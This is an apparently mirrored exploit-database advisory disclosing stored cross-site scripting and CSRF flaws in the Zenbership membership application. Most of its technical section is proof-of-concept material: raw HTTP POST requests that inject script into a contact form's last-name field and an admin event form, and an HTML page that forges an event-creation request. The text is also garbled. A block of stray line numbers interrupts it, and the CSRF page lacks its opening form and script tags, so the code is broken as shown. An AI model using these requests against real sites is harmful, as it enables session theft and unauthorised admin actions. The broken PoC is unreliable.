Zenbership 107 – Multiple Vulnerabilities

Exploit Database
151 阅读

作者： Besim

日期： 2016-10-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/40620/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

1. ADVISORY INFORMATION

========================================

Title: Zenbership (latest version) - Multiple Vulnerabilities

Application: Zenbership

Class: Sensitive Information disclosure

Versions Affected:<= latest version )

Vendor URL: https://www.zenbership.com/

Software URL: https://www.zenbership.com/Download

Bugs:CSRF / Persistent Cross Site Scripting

Date of found:23.10.2016

Author: Besim

2.CREDIT

========================================

Those vulnerabilities was identified by Besim ALTINOKand Mrs. Meryem AKDOĞAN

3. VERSIONS AFFECTED

========================================

<= latest version

4. TECHNICAL DETAILS & POC

========================================

PR1 - Stored Cross Site Scripting

========================================

1 ) Admin login admin panel

2 ) Create contact form for guest (http://site_name/path/register.php?action=reset&id=3c035c2)

3 ) Attacker enter xss payload to last name input

4 ) XSS Payload run when admin looked contact page (http://site_name/path/admin/index.php?l=contacts)

5 ) Vulnerability Parameter and Payload : &last_name=<Script>alert('ExploitDB')</Script>

## HTTP Request ##

POST /zenbership/pp-functions/form_process.php HTTP/1.1

Host: site_name

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://site_name/zenbership/register.php?action=reset&id=3c035c2

Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44; zen_cart=WJL-1484545251; zen_0176e737b450bbd83f5fc1066=253782

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 153

- POST DATA

page=1

&session=zen_0176e737b450bbd83f5fc1066

&first_name=Besim

&last_name=<Script>alert('ExploitDB')</Script>

&email=exploit@yopmail.com

PR2 - CSRF

========================================

1 ) Attacker can add new event with xss payload (stored)

- File : admin/cp-functions/event-add.php

HTTP Request and CSRF PoC

=========================

## HTTP Request ##

POST /zenbership/admin/cp-functions/event-add.php HTTP/1.1

Host: site_name

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: http://site_name/zenbership/admin/index.php?l=events

Content-Length: 1206

Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_cart=LKQ-4724862238; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44

Connection: close

- POST DATA

id=JFW996951

&ext=

&edit=0

&event[id]=JFW996951&event[status]=1

&event[name]=<Script>alert('Meryem-ExploitDB');</Script>

&event[tagline]=Meryem&event[description]=<p>Meryem AKDOGAN</p>

&event[post_rsvp_message]=<p>Meryem AKDOGAN</p>

&event[calendar_id]=1

&event[custom_template]=

&tags=

&event[starts]=2016-10-26 00:00:00

&event[ends]=2016-10-28 00:00:00

&event[start_registrations]=2016-10-24 00:00:00

&event[close_registration]=&event[early_bird_end]=

&event[online]=0&event[location_name]=Turkey

&event[url]=&event[address_line_1]=

&event[address_line_2]=&event[city]=

&event[state]=&event[zip]=

&event[country]=

&event[phone]=

&limit_attendees_dud=0

&event[max_rsvps]=

&event[members_only_view]=0

&event[members_only_rsvp]=0

&event[allow_guests]=1

&event[max_guests]=1

&form[col2][Account Overview]=section

&form[col2][company_name]=1

&form[col2][address_line_1]=0

&form[col2][address_line_2]=0

&form[col2][city]=0

&form[col2][state]=0

&form[col2][zip]=0

&form[col2][country]=0

&form[col2][url]=0

## CSRF PoC ##

<html>

<body>

<input type="hidden" name="event[name]" value="<script>alert('Meryem-ExploitDB');</Script>" />

<input type="hidden" name="event[description]" value="<p>Meryem AKDOGAN</p>
" />

<input type="hidden" name="event[post_rsvp_message]" value="<p>Meryem AKDOGAN</p>
" />

</form>

document.forms[0].submit();

</script>

</body>

</html>